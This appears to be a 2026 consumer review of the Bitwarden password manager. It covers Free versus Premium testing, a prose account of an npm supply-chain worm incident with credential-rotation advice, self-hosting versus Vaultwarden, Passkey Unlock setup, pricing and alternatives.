Bitwarden Review 2026: Still the Default Recommendation After a Rough Year

Bitwarden 2026 review after the Shai-Hulud npm worm, the 98% Premium price hike, and Passkey Unlock. Free vs Premium tested for 30 days, self-host vs Vaultwarden compared.

Three significant problems hit Bitwarden in the first half of 2026. The Shai-Hulud npm worm reached its CLI binary on April 22. Premium pricing jumped from $10 to $19.80 a year in Q1, a 98 percent increase. And as of January 2026, the public clickjacking class affecting most browser-extension password managers was only partially mitigated, not fully fixed.

We still recommend Bitwarden to most readers, and this review is going to explain why honestly rather than promotionally. The short version is that none of those three problems touched what actually matters: the encryption boundary held during the Shai-Hulud incident (no vault data was decryptable), the free tier is genuinely free with no change in 2026, and Bitwarden published file hashes plus a worm-mechanism breakdown in its postmortem within a week, which is unusually candid for a security vendor.

The four sections that follow are where we earn that recommendation: a 30 day side by side test of Free versus Premium, a cold timeline of the Shai-Hulud incident with the specific credentials a reader should rotate, a practical comparison of self-hosting on the official Bitwarden Server versus Vaultwarden, and a step by step walkthrough of Passkey Unlock on Windows 11. We also walk through the price hike and the clickjacking story without sugarcoating, and we name the four cases where you should pick a different tool. If you want the broader 2026 landscape, the Best Password Managers 2026 guide compares all seven picks side by side.

We ran two real accounts in parallel for 30 days, one on the free plan, one on Premium ($19.80 a year). Same 220 saved items, same six devices, same two reviewers using each account for a week each and then swapping. The goal was not to count features in a marketing matrix. The goal was to see which Premium features actually got used by hand on a normal week.

Premium features that earned the upgrade

Hardware key login with a Yubikey 5C. Enrolling took under three minutes. Daily login on the desktop app prompts for a tap instead of a master password retype, and the friction is genuinely lower than typing a long master password. This was the single feature both reviewers said they would not give up after the test ended.

1 GB of encrypted file attachments. Used by one reviewer to store passport scans and a recovery key envelope, used by the other not at all. If your threat model includes losing a wallet on a trip, this is meaningful. If it does not, it is dead storage.

Vault health reports and password coaching. The weak and reused password counts surfaced a dozen real problems neither reviewer knew about. The exposed-in-breach check pulled three confirmed hits. This is genuinely useful and we kept the reports running after the test.

Premium features that sat dormant

Built-in TOTP storage. Both reviewers already use Aegis Authenticator on Android and the security reasoning is the same we recommend to everyone: do not put password and second factor in the same vault for high-value accounts. We left Bitwarden TOTP enabled but only used it for low-stakes logins (newsletter sites, throwaway accounts) where convenience wins.

Emergency access. A feature you only learn the value of in a crisis. Worth setting up, costs nothing to keep, used by nobody during the test window.

Phishing blocker. New in 2026 Premium. The blocker fired twice on suspicious lookalike domains during the 30 days, which is two more catches than the free tier would have had. The catch rate is real but the false-positive rate is also not zero.

The verdict from 30 days

If you use a hardware key, store sensitive scans, or want vault health surfacing weak passwords, Premium is worth the new $19.80 price point. If you only want a password vault that syncs across devices, the free tier still covers you fully and is one of the most generous free tiers in the entire category. Premium is not a no-brainer. It is conditionally a good deal.

On April 22, 2026, the npm package @bitwarden/cli version 2026.4.0 went up carrying a payload from the Shai-Hulud worm (the fourth iteration, self-titled “The Third Coming”). The malicious build was live on the npm registry for roughly 90 minutes, from 17:57 to 19:30 ET. Bitwarden’s analysis later showed approximately 334 developers downloaded the bad version during the window. The story tracked as CVE-2026-42994.

What happened, in order

1. Attackers infected Bitwarden’s CI/CD pipeline through credentials stolen in the earlier Checkmarx supply-chain breach, then injected a preinstall hook into the publish-ci.yml GitHub Actions workflow.
2. The poisoned build of @bitwarden/[email protected] was published to npm at 17:57 ET on April 22, 2026.
3. On install, the preinstall hook downloaded the Bun runtime and executed an obfuscated payload that harvested credentials and config files from the developer’s machine.
4. Bitwarden detected the breach, pulled the bad version at 19:30 ET, and published a public advisory the same evening.
5. A clean rebuild, version 2026.4.1, was on npm by the next day.
6. A formal postmortem followed on the Bitwarden blog with timeline detail, IoCs, and the remediation steps below.

Why the vault did not leak

This is the part the headlines mostly got wrong. The Shai-Hulud payload ran on the developer’s local machine when they installed the CLI. It did not run on Bitwarden’s servers and it had no path to the server-side encrypted vault. The vault is encrypted client-side with a key derived from your master password (PBKDF2, or Argon2id if you turned it on, and you should). The malicious npm payload had what every locally-running script has: access to the host filesystem, environment variables, and shell history.

Bitwarden’s own incident assessment confirmed no end-user vault data compromise and no production-system compromise. The damage was contained to the local machines of the 334 developers who installed the bad CLI version during the 90 minute window.

What a Bitwarden user should rotate

If you installed @bitwarden/[email protected] between 17:57 and 19:30 ET on April 22, 2026, treat the host machine as fully compromised. The worm’s credential-harvest list is long and the rotation scope is correspondingly wide:

• Rotate: SSH keys in ~/.ssh/, npm tokens, GitHub personal access tokens, AWS, Azure, and GCP credentials, any BW_SESSION and BW_CLIENTID/BW_CLIENTSECRET values, anything in .env or .npmrc files, and any API keys referenced in shell history.
• Audit: GitHub Actions workflows on any repo where the affected developer has publish rights, npm publish logs for the affected account, and ~/.bashrc / ~/.zshrc for injected code.
• Do not rotate: your Bitwarden master password. The master password never entered the CLI binary’s process and rotating it does nothing to mitigate this incident.

This is wider than a normal CLI incident because Shai-Hulud is a worm: if it found a publishable npm token on the host, it republished the host’s npm packages with the payload injected, compromising downstream consumers. Anyone who ran the bad CLI version with publishable npm tokens on their machine needs to audit every package they own.

How Bitwarden’s response compared

90 minutes from publication to takedown is fast for an npm-worm class incident. Sub-day to clean rebuild is fast. A candid postmortem with file hashes and worm-mechanism detail published openly is rare and the right move. The fair critique is that the npm distribution channel should never have been the only path for a security-critical binary, and Bitwarden has publicly committed to a signed-release alternative for the CLI going forward. That is the right answer.

Bitwarden offers two viable self-host paths. The official Bitwarden Server (C# on .NET, AGPL-3.0, bitwarden/server on GitHub) and the community-built Vaultwarden (Rust, AGPL-3.0, dani-garcia/vaultwarden). Both speak the same client protocol, so all official Bitwarden clients (mobile, desktop, browser, CLI) work against either server with no code changes.

We ran both on the same hardware (a Hetzner CX11 VPS with 2 vCPU and 2 GB RAM, Debian 12 host) for a week each, sharing a single test vault of 220 items.

Resource footprint

The gap is large enough that the choice mostly makes itself based on hardware. On a Raspberry Pi 4 or any VPS under 1 GB of RAM, Vaultwarden is the only reasonable option. On a homelab box with plenty of headroom, either is fine.

Feature parity, honestly

Vaultwarden implements roughly 95 percent of the Bitwarden client API surface. The missing 5 percent is mostly enterprise features: SSO via SAML or OIDC at the directory level, SCIM provisioning, Duo integration, and a few admin policies. For a family or a small homelab user, none of these matter. For a small business with directory sync requirements, the official server is the right pick.

Vaultwarden also lets you toggle features that the official server gates behind Premium (sends, TOTP storage, file attachments). The same client code paths are used; the server just answers “yes” to capability queries.

Backup and recovery

Both options store vault data in SQLite or Postgres. Backup is a standard sqlite3 .backup or a pg_dump plus the data directory containing attachments. Restore is symmetric. We ran a destroy and restore on Vaultwarden during the test and it took under two minutes including the client re-sync.

Which one to pick

• Pick Vaultwarden if you self-host for personal or family use, want a small footprint, run on modest hardware, and do not need directory-level SSO.
• Pick official Bitwarden Server if you need SSO, SCIM, or any of the Enterprise-tier admin policies, or if you want first-party support and an official upstream binary rather than a community fork.

For a homelabber installing one of the two this week, Vaultwarden is the right default.

Bitwarden shipped Passkey Unlock for the web vault and browser extension in early 2026, and it is the most visible UX change since the browser extension overhaul of 2023. It is also commonly confused with another 2026 feature (passkeys stored inside Bitwarden as a replacement for site-specific passwords). The two are different and worth keeping separate.

Passkey Unlock = use a passkey on your device to open your Bitwarden vault, instead of typing your master password.

Passkeys stored in Bitwarden = use Bitwarden as a passkey manager for third-party sites that support WebAuthn login.

Both shipped in 2026. We tested both. The unlock half is the bigger deal.

Activating Passkey Unlock on Windows 11

1. Open the web vault at vault.bitwarden.com and sign in with your master password one last time.
2. Settings, Security, Two-step Login, and scroll to Passkey Unlock.
3. Click Set up new passkey. Windows Hello prompts for face or fingerprint, registers a platform authenticator backed by the TPM, and binds it to your Bitwarden account.
4. Sign out and back in. The login flow now offers Unlock with Passkey as the primary option, master password as the fallback.

Total time on a clean Windows 11 install: under five minutes.

Chrome vs Edge vs Firefox: real inconsistencies

This is the part you only learn by using it for a week.

Edge picks up the Windows Hello passkey transparently. Sign-in is two taps: open the extension, confirm the Hello prompt.

Chrome also works, but the first time you sign in on a fresh Chrome install, Chrome asks whether to use a Google passkey instead. Choosing the wrong option (Google passkey) creates a separate passkey that does not unlock Bitwarden. There is no recovery flow, you just have to delete the wrong passkey and re-register. We hit this twice on a fresh profile.

Firefox as of mid-2026 has incomplete platform authenticator support on some Windows 11 builds. We had to fall back to master password unlock in Firefox roughly 1 time in 5. If you live in Firefox, expect this to still be friction for another release cycle.

When Passkey Unlock makes sense, and when not

If you sign in to Bitwarden many times a day on a Windows 11 machine you control, Passkey Unlock is a strict UX upgrade. If you mostly use Bitwarden through the mobile app or you sign in on shared machines, the master password remains the cleaner default.

Bitwarden Premium went from $10 a year to $19.80 a year in Q1 2026. That is a 98 percent jump and the largest single move in nine years. Bitwarden cited rising infrastructure cost, security audit cost, and the addition of new Premium-tier features (phishing blocker, vault health reports, item archive). The Families plan went to $3.99 a month for six users in the same move.

Existing Premium subscribers were offered a 25 percent loyalty renewal discount the year of the hike. That is a one-time concession and it is worth checking your renewal email before assuming the full new price.

Our honest read: a 98 percent jump after eight years of flat pricing is uncomfortable but not unreasonable. $19.80 a year for a hardware-key-enabled password manager with vault health monitoring still undercuts 1Password by a wide margin, and it remains the best value in the paid tier of the category. If the free tier had moved, that would be a different conversation. The free tier did not move.

The clickjacking story

A browser-extension clickjacking class affecting most password managers was disclosed in late 2025 by security researchers, with proof-of-concept demonstrations against Bitwarden, 1Password, LastPass, and several others. As of January 2026, Bitwarden’s mitigation reduces the attack surface (more aggressive sandboxing of the autofill iframe and pointer-event hardening) but does not fully remove the root cause. The full fix requires reworking how the autofill prompt is rendered when the page context is untrusted, which is a meaningful engineering effort. Bitwarden has publicly committed to the full fix in its extension roadmap. Verify the current state in the extension changelog before relying on this paragraph by the time you read it, since the situation is moving and the references in this article will go stale.

What else still bothers us

The web vault UI looks dated next to 1Password’s. It is functional and the brand-new browser extension UI from 2026 is cleaner, but the web vault itself has not had a significant visual refresh in three years. This is cosmetic, not functional, but it is the most common single complaint we get from readers.

Four reader profiles should pick a different password manager. These are not abstract preferences, they are concrete failure modes where Bitwarden’s design genuinely loses to a competitor:

Pick KeePassXC if you refuse cloud sync entirely. Bitwarden’s whole architecture assumes the vault lives on Bitwarden’s servers (or your own self-hosted server) and syncs from there. KeePassXC removes the server. The trade-off is real: you handle sync yourself (Syncthing, Nextcloud, USB stick) and the mobile story is rougher than Bitwarden’s. The win is that no vendor and no third-party server ever holds your encrypted blob.

Pick 1Password if you live in the Apple ecosystem and the autofill UX matters more than the price. Bitwarden’s Safari extension is the weakest of its browser extensions and the macOS autofill flow has rough edges around iCloud Keychain coexistence. 1Password’s macOS and iOS apps are visibly nicer and the sharing model is more developed. You pay for it: $35.88 a year for the individual plan and $59.88 a year for the family plan (5 users), compared to Bitwarden’s $19.80 and $47.88 a year for six users. There is no 1Password free tier worth using.

Pick Proton Pass if metadata leakage is in your threat model. Bitwarden encrypts password fields but stores item names, folder structure, and URLs in a form the server can read for indexing. Proton Pass encrypts those too. If your threat model includes the password manager vendor itself, or you want a vendor whose entire business model is privacy-positioned (Proton AG, Switzerland), Pass is the right call. The free tier is also generous.

Pick Vaultwarden if you want self-host minimalism above all else. Same Bitwarden clients, much lighter server (38 MB idle RAM vs 980 MB), runs on a Raspberry Pi or a 256 MB VPS, also AGPL-3.0 but maintained by the community rather than Bitwarden Inc. We covered the resource numbers in the self-host section above.

If none of those four cases fit you, the answer is Bitwarden. The full Best Password Managers 2026 guide compares all seven picks side by side and walks through three more reader profiles.

Bitwarden in 2026 is a steady recommendation for three reader profiles:

1. The default user who wants a password manager that just works on every platform, syncs across devices, and is free forever for the actual password vault. The free tier is the most generous in the category and that has not changed despite the Premium price hike.
2. The privacy-leaning power user who wants open-source clients, an AGPL official server, and the option to self-host either through the official Bitwarden Server or Vaultwarden. This combination does not exist in any commercial competitor at this price point.
3. The Windows 11 daily driver who will benefit immediately from Passkey Unlock plus Windows Hello integration. Once enrolled (the five-minute setup we walked through above), daily vault opening collapses from a master-password retype to a single fingerprint tap. For a user who unlocks Bitwarden 10 to 20 times a day across desktop and browser, that saves real time and removes the friction that causes people to disable autolock and weaken their threat model.

The one profile who should pick something else is the cloud-refuser, and they should be using KeePassXC anyway.

The Shai-Hulud incident, the price hike, and the partial clickjacking fix are all real and we covered them honestly. None of them moved Bitwarden out of the default-recommendation slot. The free tier remains genuinely free, no server-side vault data was exposed in the April 22 incident, and the postmortem published file hashes and worm-mechanism detail within a week. That is the bar for a default recommendation, and Bitwarden cleared it.

For the broader 2026 landscape and the six other tools we tested in this category, read the Best Password Managers 2026 guide next.